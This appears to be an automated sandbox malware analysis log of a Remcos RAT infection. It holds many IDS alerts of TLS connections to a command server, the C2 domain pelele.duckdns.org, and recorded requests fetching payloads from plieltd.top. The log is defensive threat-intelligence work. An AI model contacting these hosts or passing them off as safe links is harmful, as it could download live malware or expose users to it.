                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49838 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49849 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49874 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49886 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49897 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49909 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49920 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49945 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49975 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49964 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49997 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50008 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49986 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50020 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50040 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50044 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50043 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50045 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50042 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50048 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50053 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50046 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50050 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50054 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50063 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50062 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50064 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50058 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50066 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50052 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50068 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50057 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50056 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50071 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50072 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50073 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50047 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50041 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50076 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50074 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50067 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50030 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50080 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50069 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50051 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50065 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50093 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50086 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50060 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50078 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50095 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50088 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50083 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50107 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50075 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50087 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50102 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50094 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50091 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50100 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50106 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50109 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50115 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50101 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50079 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50122 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50082 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50116 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50113 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50120 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50117 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50089 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50128 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50136 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50090 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50084 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50108 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50105 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50140 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50111 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50129 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50138 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50137 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50098 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50061 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50134 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50125 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50143 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50135 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50133 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50123 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50126 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50146 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50092 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50131 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50121 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50157 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50148 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50156 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50160 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50161 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50155 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50142 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50118 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50097 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50141 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50103 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50147 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50158 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50139 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50152 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50145 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50099 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50127 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50085 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50144 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50159 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50112 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50132 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50104 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50153 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50162 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50114 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50110 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50119 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50151 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50124 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50130 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50154 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50149 -> 192.169.69.26:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50150 -> 192.169.69.26:51525
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: pelele.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: pelele.duckdns.org
                Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.56.189:443
                Source: global trafficHTTP traffic detected: GET /Misogynists.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /sNFAyMOQkRdGglJM44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Misogynists.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /sNFAyMOQkRdGglJM44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: powershell.exe, 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1801491105.00000272921D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://plieltd.top
                Source: powershell.exe, 00000002.00000002.1801491105.0000027290451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1950020530.00000000044E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: msiexec.exe, 00000009.00000003.2061439415.0000000008921000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3171744633.000000000894D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coU
                Source: powershell.exe, 00000002.00000002.1801491105.0000027290451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.1950020530.00000000044E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1948668506.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1801491105.0000027290FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1963840942.0000000005547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.1801491105.0000027290894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1801491105.0000027291A9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top
                Source: powershell.exe, 00000002.00000002.1830962562.00000272A8770000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4145675736.00000000088EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/
                Source: powershell.exe, 00000004.00000002.1950020530.0000000004636000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Misogynists.pfm
